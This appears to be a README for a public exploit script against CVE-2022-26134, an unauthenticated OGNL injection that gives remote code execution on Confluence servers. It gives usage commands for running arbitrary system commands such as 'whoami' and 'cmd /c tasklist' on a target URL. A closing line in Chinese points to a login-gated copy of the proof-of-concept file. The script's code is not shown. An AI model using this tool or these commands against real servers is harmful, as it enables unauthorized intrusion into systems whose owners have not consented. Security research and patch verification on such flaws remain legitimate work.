(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server
# CVE-2022-26134
(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server
Require:Python2 or Python3
Usage:
```
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"
```

if target is windows system, please use the script as follows, for example:
```
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
```

登录后查看神龙缓存的 POC 文件快照
登录查看